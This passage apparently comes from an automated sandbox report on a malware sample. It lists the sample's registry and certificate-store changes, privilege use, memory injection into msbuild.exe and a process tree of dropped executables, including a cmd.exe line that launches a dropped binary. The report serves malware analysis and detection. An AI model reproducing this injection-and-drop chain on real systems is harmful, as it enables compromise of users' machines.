Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" wwBOAPkgANJgdWjG6GOEj92T.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" wwBOAPkgANJgdWjG6GOEj92T.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" wwBOAPkgANJgdWjG6GOEj92T.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" wwBOAPkgANJgdWjG6GOEj92T.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" wwBOAPkgANJgdWjG6GOEj92T.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" wwBOAPkgANJgdWjG6GOEj92T.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Processes:
b04vaIYl7t9GKnLT4gGKsr1W.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 b04vaIYl7t9GKnLT4gGKsr1W.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e b04vaIYl7t9GKnLT4gGKsr1W.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e b04vaIYl7t9GKnLT4gGKsr1W.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
u2zg.0.exeD5DiMuAoMYdqs3uIyHVh2vxp.exeRegAsm.exedialer.exepowershell.exepowershell.exepowershell.exewwBOAPkgANJgdWjG6GOEj92T.exeRW0Wiuz2PCYu43eGZVwdlZGN.exefYmZfMjQZC7bcgTgxzU4okLP.exepowershell.exepowershell.exepowershell.exefYmZfMjQZC7bcgTgxzU4okLP.exeRW0Wiuz2PCYu43eGZVwdlZGN.exewwBOAPkgANJgdWjG6GOEj92T.exepid Process 1308 u2zg.0.exe 1308 u2zg.0.exe 3752 D5DiMuAoMYdqs3uIyHVh2vxp.exe 3752 D5DiMuAoMYdqs3uIyHVh2vxp.exe 3752 D5DiMuAoMYdqs3uIyHVh2vxp.exe 3752 D5DiMuAoMYdqs3uIyHVh2vxp.exe 3208 RegAsm.exe 3208 RegAsm.exe 2380 dialer.exe 2380 dialer.exe 2380 dialer.exe 2380 dialer.exe 1120 powershell.exe 1120 powershell.exe 1476 powershell.exe 1476 powershell.exe 804 powershell.exe 804 powershell.exe 804 powershell.exe 1120 powershell.exe 1476 powershell.exe 4996 wwBOAPkgANJgdWjG6GOEj92T.exe 4568 RW0Wiuz2PCYu43eGZVwdlZGN.exe 4568 RW0Wiuz2PCYu43eGZVwdlZGN.exe 4996 wwBOAPkgANJgdWjG6GOEj92T.exe 1164 fYmZfMjQZC7bcgTgxzU4okLP.exe 1164 fYmZfMjQZC7bcgTgxzU4okLP.exe 3912 powershell.exe 3912 powershell.exe 4912 powershell.exe 4912 powershell.exe 3540 powershell.exe 3540 powershell.exe 3912 powershell.exe 1308 u2zg.0.exe 1308 u2zg.0.exe 4912 powershell.exe 3540 powershell.exe 1664 fYmZfMjQZC7bcgTgxzU4okLP.exe 1664 fYmZfMjQZC7bcgTgxzU4okLP.exe 1664 fYmZfMjQZC7bcgTgxzU4okLP.exe 1664 fYmZfMjQZC7bcgTgxzU4okLP.exe 1664 fYmZfMjQZC7bcgTgxzU4okLP.exe 1664 fYmZfMjQZC7bcgTgxzU4okLP.exe 1664 fYmZfMjQZC7bcgTgxzU4okLP.exe 1664 fYmZfMjQZC7bcgTgxzU4okLP.exe 1664 fYmZfMjQZC7bcgTgxzU4okLP.exe 1664 fYmZfMjQZC7bcgTgxzU4okLP.exe 1332 RW0Wiuz2PCYu43eGZVwdlZGN.exe 1332 RW0Wiuz2PCYu43eGZVwdlZGN.exe 684 wwBOAPkgANJgdWjG6GOEj92T.exe 684 wwBOAPkgANJgdWjG6GOEj92T.exe 1332 RW0Wiuz2PCYu43eGZVwdlZGN.exe 1332 RW0Wiuz2PCYu43eGZVwdlZGN.exe 684 wwBOAPkgANJgdWjG6GOEj92T.exe 684 wwBOAPkgANJgdWjG6GOEj92T.exe 1332 RW0Wiuz2PCYu43eGZVwdlZGN.exe 1332 RW0Wiuz2PCYu43eGZVwdlZGN.exe 1332 RW0Wiuz2PCYu43eGZVwdlZGN.exe 1332 RW0Wiuz2PCYu43eGZVwdlZGN.exe 1332 RW0Wiuz2PCYu43eGZVwdlZGN.exe 1332 RW0Wiuz2PCYu43eGZVwdlZGN.exe 684 wwBOAPkgANJgdWjG6GOEj92T.exe 684 wwBOAPkgANJgdWjG6GOEj92T.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
msbuild.exepowershell.exepowershell.exepowershell.exeRW0Wiuz2PCYu43eGZVwdlZGN.exewwBOAPkgANJgdWjG6GOEj92T.exefYmZfMjQZC7bcgTgxzU4okLP.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.execsrss.exesc.exepowershell.exepowershell.exepowershell.EXEdescription pid Process Token: SeDebugPrivilege 576 msbuild.exe Token: SeDebugPrivilege 1120 powershell.exe Token: SeDebugPrivilege 1476 powershell.exe Token: SeDebugPrivilege 804 powershell.exe Token: SeDebugPrivilege 4568 RW0Wiuz2PCYu43eGZVwdlZGN.exe Token: SeDebugPrivilege 4996 wwBOAPkgANJgdWjG6GOEj92T.exe Token: SeImpersonatePrivilege 4996 wwBOAPkgANJgdWjG6GOEj92T.exe Token: SeImpersonatePrivilege 4568 RW0Wiuz2PCYu43eGZVwdlZGN.exe Token: SeDebugPrivilege 1164 fYmZfMjQZC7bcgTgxzU4okLP.exe Token: SeImpersonatePrivilege 1164 fYmZfMjQZC7bcgTgxzU4okLP.exe Token: SeDebugPrivilege 3912 powershell.exe Token: SeDebugPrivilege 4912 powershell.exe Token: SeDebugPrivilege 3540 powershell.exe Token: SeDebugPrivilege 2788 powershell.EXE Token: SeDebugPrivilege 2192 powershell.exe Token: SeDebugPrivilege 4908 powershell.exe Token: SeDebugPrivilege 3676 powershell.exe Token: SeDebugPrivilege 1040 powershell.exe Token: SeDebugPrivilege 3908 powershell.exe Token: SeDebugPrivilege 3676 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 4788 powershell.EXE Token: SeDebugPrivilege 1176 powershell.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeSystemEnvironmentPrivilege 480 csrss.exe Token: SeSecurityPrivilege 1804 sc.exe Token: SeSecurityPrivilege 1804 sc.exe Token: SeDebugPrivilege 2252 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeDebugPrivilege 4276 powershell.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
u2zg.1.exepid Process 3396 u2zg.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exemsbuild.exeMQRy5a2TwXi0WZTzeI0qoVpB.exeYTL0PmmS83SCp78qfDgfizjt.exeRegAsm.exeb04vaIYl7t9GKnLT4gGKsr1W.exedescription pid Process procid_target PID 4932 wrote to memory of 576 4932 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 77 PID 4932 wrote to memory of 576 4932 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 77 PID 4932 wrote to memory of 576 4932 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 77 PID 4932 wrote to memory of 576 4932 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 77 PID 4932 wrote to memory of 576 4932 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 77 PID 4932 wrote to memory of 576 4932 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 77 PID 4932 wrote to memory of 576 4932 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 77 PID 4932 wrote to memory of 576 4932 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 77 PID 4932 wrote to memory of 1972 4932 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 78 PID 4932 wrote to memory of 1972 4932 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 78 PID 4932 wrote to memory of 1972 4932 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 78 PID 576 wrote to memory of 3868 576 msbuild.exe 82 PID 576 wrote to memory of 3868 576 msbuild.exe 82 PID 576 wrote to memory of 3868 576 msbuild.exe 82 PID 576 wrote to memory of 1164 576 msbuild.exe 83 PID 576 wrote to memory of 1164 576 msbuild.exe 83 PID 576 wrote to memory of 1164 576 msbuild.exe 83 PID 576 wrote to memory of 4996 576 msbuild.exe 163 PID 576 wrote to memory of 4996 576 msbuild.exe 163 PID 576 wrote to memory of 4996 576 msbuild.exe 163 PID 576 wrote to memory of 3156 576 msbuild.exe 85 PID 576 wrote to memory of 3156 576 msbuild.exe 85 PID 576 wrote to memory of 3156 576 msbuild.exe 85 PID 576 wrote to memory of 4568 576 msbuild.exe 87 PID 576 wrote to memory of 4568 576 msbuild.exe 87 PID 576 wrote to memory of 4568 576 msbuild.exe 87 PID 576 wrote to memory of 3752 576 msbuild.exe 88 PID 576 wrote to memory of 3752 576 msbuild.exe 88 PID 576 wrote to memory of 3752 576 msbuild.exe 88 PID 3156 wrote to memory of 3940 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 208 PID 3156 wrote to memory of 3940 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 208 PID 3156 wrote to memory of 3940 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 208 PID 3156 wrote to memory of 3208 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 90 PID 3156 wrote to memory of 3208 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 90 PID 3156 wrote to memory of 3208 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 90 PID 3156 wrote to memory of 3208 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 90 PID 3156 wrote to memory of 3208 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 90 PID 3156 wrote to memory of 3208 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 90 PID 3156 wrote to memory of 3208 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 90 PID 3156 wrote to memory of 3208 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 90 PID 3156 wrote to memory of 3208 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 90 PID 3156 wrote to memory of 3208 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 90 PID 3156 wrote to memory of 3208 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 90 PID 3868 wrote to memory of 1308 3868 YTL0PmmS83SCp78qfDgfizjt.exe 182 PID 3868 wrote to memory of 1308 3868 YTL0PmmS83SCp78qfDgfizjt.exe 182 PID 3868 wrote to memory of 1308 3868 YTL0PmmS83SCp78qfDgfizjt.exe 182 PID 3868 wrote to memory of 3396 3868 YTL0PmmS83SCp78qfDgfizjt.exe 97 PID 3868 wrote to memory of 3396 3868 YTL0PmmS83SCp78qfDgfizjt.exe 97 PID 3868 wrote to memory of 3396 3868 YTL0PmmS83SCp78qfDgfizjt.exe 97 PID 576 wrote to memory of 3460 576 msbuild.exe 100 PID 576 wrote to memory of 3460 576 msbuild.exe 100 PID 576 wrote to memory of 3460 576 msbuild.exe 100 PID 3208 wrote to memory of 2380 3208 RegAsm.exe 101 PID 3208 wrote to memory of 2380 3208 RegAsm.exe 101 PID 3208 wrote to memory of 2380 3208 RegAsm.exe 101 PID 3208 wrote to memory of 2380 3208 RegAsm.exe 101 PID 3208 wrote to memory of 2380 3208 RegAsm.exe 101 PID 3460 wrote to memory of 1808 3460 b04vaIYl7t9GKnLT4gGKsr1W.exe 103 PID 3460 wrote to memory of 1808 3460 b04vaIYl7t9GKnLT4gGKsr1W.exe 103 PID 3460 wrote to memory of 1808 3460 b04vaIYl7t9GKnLT4gGKsr1W.exe 103 PID 3460 wrote to memory of 4412 3460 b04vaIYl7t9GKnLT4gGKsr1W.exe 105 PID 3460 wrote to memory of 4412 3460 b04vaIYl7t9GKnLT4gGKsr1W.exe 105 PID 3460 wrote to memory of 4412 3460 b04vaIYl7t9GKnLT4gGKsr1W.exe 105 PID 3460 wrote to memory of 2892 3460 b04vaIYl7t9GKnLT4gGKsr1W.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2828
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe"C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe"C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe"C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe"4⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1308 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe"5⤵PID:4700
-
C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe"C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe"6⤵
- Executes dropped EXE
